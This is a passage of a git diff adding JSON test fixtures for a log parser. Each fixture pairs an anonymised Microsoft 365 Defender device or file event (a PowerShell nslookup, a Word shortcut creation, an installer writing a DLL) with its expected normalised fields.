"{\"time\":\"2024-11-12T10:18:46.3194193Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:17:19.1406475Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.name.fr\",\"ReportId\":134294,\"InitiatingProcessId\":27568,\"InitiatingProcessCreationTime\":\"2024-11-12T10:15:16.4871111Z\",\"InitiatingProcessCommandLine\":\"powershell.exe\",\"InitiatingProcessParentFileName\":\"WindowsTerminal.exe\",\"InitiatingProcessParentId\":884,\"InitiatingProcessParentCreationTime\":\"2024-11-12T09:20:42.8246765Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"powershell.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"Command\\\":\\\"nslookup.exe user01-domain.USER01.local 1.2.3.4\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"PowerShellCommand\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":398124703,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JDOE@domain.fr\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-5678-abcd-ef0123456789\",\"FileSize\":null,\"InitiatingProcessFileSize\":450560,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"InitiatingProcessVersionInfoProductVersion\":\"10.0.22621.3085\",\"InitiatingProcessVersionInfoInternalFileName\":\"POWERSHELL\",\"InitiatingProcessVersionInfoOriginalFileName\":\"PowerShell.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows PowerShell\",\"InitiatingProcessSessionId\":6,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:15:59.5508823Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-11-12T10:18:46.3194193Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:17:19.1406475Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.name.fr\",\"ReportId\":134294,\"InitiatingProcessId\":27568,\"InitiatingProcessCreationTime\":\"2024-11-12T10:15:16.4871111Z\",\"InitiatingProcessCommandLine\":\"powershell.exe\",\"InitiatingProcessParentFileName\":\"WindowsTerminal.exe\",\"InitiatingProcessParentId\":884,\"InitiatingProcessParentCreationTime\":\"2024-11-12T09:20:42.8246765Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"powershell.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"Command\\\":\\\"nslookup.exe user01-domain.USER01.local 1.2.3.4\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"PowerShellCommand\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":398124703,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JDOE@domain.fr\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-5678-abcd-ef0123456789\",\"FileSize\":null,\"InitiatingProcessFileSize\":450560,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"InitiatingProcessVersionInfoProductVersion\":\"10.0.22621.3085\",\"InitiatingProcessVersionInfoInternalFileName\":\"POWERSHELL\",\"InitiatingProcessVersionInfoOriginalFileName\":\"PowerShell.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows PowerShell\",\"InitiatingProcessSessionId\":6,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:15:59.5508823Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T10:15:59.550882Z", + "action": { + "properties": { + "InitiatingProcessAccountObjectId": "abcdef90-1234-5678-abcd-ef0123456789", + "InitiatingProcessCommandLine": "powershell.exe", + "InitiatingProcessFileSize": 450560, + "InitiatingProcessLogonId": "398124703", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Windows PowerShell", + "InitiatingProcessVersionInfoInternalFileName": "POWERSHELL", + "InitiatingProcessVersionInfoOriginalFileName": "PowerShell.EXE", + "InitiatingProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "InitiatingProcessVersionInfoProductVersion": "10.0.22621.3085" + }, + "type": "PowerShellCommand" + }, + "host": { + "id": "abcdef0123456789", + "name": "device.name.fr" + }, + "microsoft": { + "defender": { + "report": { + "id": "134294" + } + } + }, + "process": { + "command_line": "powershell.exe", + "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "powershell.exe", + "parent": { + "name": "WindowsTerminal.exe", + "pid": 884, + "start": "2024-11-12T09:20:42.824676Z" + }, + "pid": 27568, + "start": "2024-11-12T10:15:16.487111Z", + "user": { + "domain": "domain", + "email": "JDOE@domain.fr", + "id": "S-1-2-3", + "name": "jdoe" + }, + "working_directory": "c:\\windows\\system32\\windowspowershell\\v1.0" + }, + "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + ] + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json new file mode 100644 index 000000000..672754009 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json @@ -0,0 +1,99 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-12T10:18:30.9849876Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:00.0874785Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":22722,\"InitiatingProcessId\":20948,\"InitiatingProcessCreationTime\":\"2024-11-12T10:02:28.7779103Z\",\"InitiatingProcessCommandLine\":\"\\\"WINWORD.EXE\\\" /n \\\"I:\\\\COMPANY\\\\Service\\\\FILE.doc\\\" /o \\\"\\\"\",\"InitiatingProcessParentFileName\":\"explorer.exe\",\"InitiatingProcessParentId\":14616,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:47:41.9520775Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"winword.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files (x86)\\\\microsoft office\\\\root\\\\office16\\\\winword.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":\"f1d50e0d3e0ba197baf152614e0cd94487a1142e\",\"MD5\":\"5d5608654828cf052ba013b3c37cbb61\",\"FileName\":\"FILENAME.LNK\",\"FolderPath\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\Microsoft\\\\Office\\\\Recent\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"FileSizeInBytes\\\":914,\\\"VolumeGuidPath\\\":\\\"\\\\\\\\\\\\\\\\?\\\\\\\\Volume{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}\\\",\\\"IsOnRemovableMedia\\\":false,\\\"ShellLinkRunAsAdmin\\\":false,\\\"ShellLinkShowCommand\\\":\\\"SW_SHOWNORMAL\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"SHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"RemoteUrl\":null,\"ProcessCreationTime\":\"2024-11-06T16:05:23.1138023Z\",\"ProcessTokenElevation\":null,\"ActionType\":\"ShellLinkCreateFileEvent\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":8066492,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JOHNDOE@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-abcd-5678-abcdef123456\",\"FileSize\":null,\"InitiatingProcessFileSize\":1621656,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Office\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"WinWord\",\"InitiatingProcessVersionInfoOriginalFileName\":\"WinWord.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft Word\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:23.3307226Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-11-12T10:18:30.9849876Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:00.0874785Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":22722,\"InitiatingProcessId\":20948,\"InitiatingProcessCreationTime\":\"2024-11-12T10:02:28.7779103Z\",\"InitiatingProcessCommandLine\":\"\\\"WINWORD.EXE\\\" /n \\\"I:\\\\COMPANY\\\\Service\\\\FILE.doc\\\" /o \\\"\\\"\",\"InitiatingProcessParentFileName\":\"explorer.exe\",\"InitiatingProcessParentId\":14616,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:47:41.9520775Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"winword.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files (x86)\\\\microsoft office\\\\root\\\\office16\\\\winword.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":\"f1d50e0d3e0ba197baf152614e0cd94487a1142e\",\"MD5\":\"5d5608654828cf052ba013b3c37cbb61\",\"FileName\":\"FILENAME.LNK\",\"FolderPath\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\Microsoft\\\\Office\\\\Recent\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"FileSizeInBytes\\\":914,\\\"VolumeGuidPath\\\":\\\"\\\\\\\\\\\\\\\\?\\\\\\\\Volume{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}\\\",\\\"IsOnRemovableMedia\\\":false,\\\"ShellLinkRunAsAdmin\\\":false,\\\"ShellLinkShowCommand\\\":\\\"SW_SHOWNORMAL\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"SHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"RemoteUrl\":null,\"ProcessCreationTime\":\"2024-11-06T16:05:23.1138023Z\",\"ProcessTokenElevation\":null,\"ActionType\":\"ShellLinkCreateFileEvent\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":8066492,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JOHNDOE@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-abcd-5678-abcdef123456\",\"FileSize\":null,\"InitiatingProcessFileSize\":1621656,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Office\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"WinWord\",\"InitiatingProcessVersionInfoOriginalFileName\":\"WinWord.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft Word\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:23.3307226Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T10:17:23.330722Z", + "action": { + "properties": { + "InitiatingProcessAccountObjectId": "abcdef90-1234-abcd-5678-abcdef123456", + "InitiatingProcessCommandLine": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", + "InitiatingProcessFileSize": 1621656, + "InitiatingProcessLogonId": "8066492", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Microsoft Word", + "InitiatingProcessVersionInfoInternalFileName": "WinWord", + "InitiatingProcessVersionInfoOriginalFileName": "WinWord.exe", + "InitiatingProcessVersionInfoProductName": "Microsoft Office", + "InitiatingProcessVersionInfoProductVersion": "16.0.17928.20216" + }, + "type": "ShellLinkCreateFileEvent" + }, + "file": { + "directory": "C:\\Users\\jdoe\\AppData\\Roaming\\Microsoft\\Office\\Recent", + "hash": { + "md5": "5d5608654828cf052ba013b3c37cbb61", + "sha1": "f1d50e0d3e0ba197baf152614e0cd94487a1142e", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "FILENAME.LNK" + }, + "host": { + "id": "abcdef0123456789", + "name": "user.company.local" + }, + "microsoft": { + "defender": { + "report": { + "id": "22722" + } + } + }, + "process": { + "args": [ + "\"\"", + "\"I:\\COMPANY\\Service\\FILE.doc\"", + "/n", + "/o" + ], + "command_line": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", + "executable": "c:\\program files (x86)\\microsoft office\\root\\office16\\winword.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" + }, + "name": "winword.exe", + "parent": { + "name": "explorer.exe", + "pid": 14616, + "start": "2024-11-12T08:47:41.952077Z" + }, + "pid": 20948, + "start": "2024-11-12T10:02:28.777910Z", + "user": { + "domain": "company", + "email": "JOHNDOE@COMPANY.COM", + "id": "S-1-2-3", + "name": "jdoe" + }, + "working_directory": "c:\\program files (x86)\\microsoft office\\root\\office16" + }, + "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "5d5608654828cf052ba013b3c37cbb61", + "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232", + "f1d50e0d3e0ba197baf152614e0cd94487a1142e" + ] + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json b/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json new file mode 100644 index 000000000..73d8718f8 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json @@ -0,0 +1,107 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-08T14:42:24.2882642Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceFileEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:41:06.9726687Z\",\"properties\":{\"SHA1\":\"8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264\",\"FileSize\":640920,\"MD5\":\"9a3af3a9ce0217bccce1d161e0b6bfde\",\"FileName\":\"FileName.dll\",\"FolderPath\":\"C:\\\\Program Files\\\\FileName.dll\",\"InitiatingProcessCommandLine\":\"commandexec.exe /V\",\"InitiatingProcessFileName\":\"commandexec.exe\",\"InitiatingProcessParentFileName\":\"services.exe\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\commandexec.exe\",\"InitiatingProcessParentCreationTime\":\"2024-10-09T01:02:27.2227081Z\",\"InitiatingProcessId\":16468,\"DeviceName\":\"device.company.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:23.2383083Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessParentId\":888,\"ReportId\":341972,\"SHA256\":\"30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595\",\"InitiatingProcessIntegrityLevel\":\"System\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"FileOriginReferrerUrl\":null,\"AppGuardContainerId\":\"\",\"ActionType\":\"FileCreated\",\"SensitivityLabel\":null,\"SensitivitySubLabel\":null,\"IsAzureInfoProtectionApplied\":null,\"RequestProtocol\":\"Local\",\"ShareName\":null,\"RequestSourceIP\":null,\"RequestSourcePort\":null,\"RequestAccountName\":\"Syst\u00e8me\",\"RequestAccountDomain\":\"ACCOUNT DOMAIN\",\"RequestAccountSid\":\"S-1-2-3\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AdditionalFields\":\"{\\\"FileType\\\":\\\"PortableExecutable\\\"}\",\"PreviousFolderPath\":\"\",\"PreviousFileName\":\"\",\"InitiatingProcessFileSize\":176128,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"commandexec\",\"InitiatingProcessVersionInfoOriginalFileName\":\"commandexec.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"InitiatingProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-08T14:38:51.9048761Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-11-08T14:42:24.2882642Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceFileEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:41:06.9726687Z\",\"properties\":{\"SHA1\":\"8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264\",\"FileSize\":640920,\"MD5\":\"9a3af3a9ce0217bccce1d161e0b6bfde\",\"FileName\":\"FileName.dll\",\"FolderPath\":\"C:\\\\Program Files\\\\FileName.dll\",\"InitiatingProcessCommandLine\":\"commandexec.exe /V\",\"InitiatingProcessFileName\":\"commandexec.exe\",\"InitiatingProcessParentFileName\":\"services.exe\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\commandexec.exe\",\"InitiatingProcessParentCreationTime\":\"2024-10-09T01:02:27.2227081Z\",\"InitiatingProcessId\":16468,\"DeviceName\":\"device.company.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:23.2383083Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessParentId\":888,\"ReportId\":341972,\"SHA256\":\"30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595\",\"InitiatingProcessIntegrityLevel\":\"System\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"FileOriginReferrerUrl\":null,\"AppGuardContainerId\":\"\",\"ActionType\":\"FileCreated\",\"SensitivityLabel\":null,\"SensitivitySubLabel\":null,\"IsAzureInfoProtectionApplied\":null,\"RequestProtocol\":\"Local\",\"ShareName\":null,\"RequestSourceIP\":null,\"RequestSourcePort\":null,\"RequestAccountName\":\"Syst\u00e8me\",\"RequestAccountDomain\":\"ACCOUNT DOMAIN\",\"RequestAccountSid\":\"S-1-2-3\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AdditionalFields\":\"{\\\"FileType\\\":\\\"PortableExecutable\\\"}\",\"PreviousFolderPath\":\"\",\"PreviousFileName\":\"\",\"InitiatingProcessFileSize\":176128,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"commandexec\",\"InitiatingProcessVersionInfoOriginalFileName\":\"commandexec.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"InitiatingProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-08T14:38:51.9048761Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "file" + ], + "dataset": "device_file_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-08T14:38:51.904876Z", + "action": { + "properties": { + "InitiatingProcessCommandLine": "commandexec.exe /V", + "InitiatingProcessFileSize": 176128, + "InitiatingProcessIntegrityLevel": "System", + "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Windows\u00ae installer", + "InitiatingProcessVersionInfoInternalFileName": "commandexec", + "InitiatingProcessVersionInfoOriginalFileName": "commandexec.exe", + "InitiatingProcessVersionInfoProductName": "Windows Installer - Unicode", + "InitiatingProcessVersionInfoProductVersion": "5.0.22621.3880", + "RequestAccountSid": "S-1-2-3" + }, + "type": "FileCreated" + }, + "file": { + "directory": "C:\\Program Files\\FileName.dll", + "hash": { + "md5": "9a3af3a9ce0217bccce1d161e0b6bfde", + "sha1": "8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264", + "sha256": "30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595" + }, + "name": "FileName.dll", + "size": 640920 + }, + "host": { + "id": "123456789abcdef", + "name": "device.company.local" + }, + "microsoft": { + "defender": { + "report": { + "id": "341972" + } + } + }, + "network": { + "protocol": "Local" + }, + "process": { + "args": [ + "/V" + ], + "command_line": "commandexec.exe /V", + "executable": "c:\\windows\\system32\\commandexec.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" + }, + "name": "commandexec.exe", + "parent": { + "name": "services.exe", + "pid": 888, + "start": "2024-10-09T01:02:27.222708Z" + }, + "pid": 16468, + "start": "2024-11-08T14:38:23.238308Z", + "user": { + "domain": "account domain", + "id": "S-1-2-3", + "name": "syst\u00e8me" + }, + "working_directory": "c:\\windows\\system32" + }, + "related": { + "hash": [ + "30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595", + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323", + "8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264", + "9a3af3a9ce0217bccce1d161e0b6bfde" + ], + "user": [ + 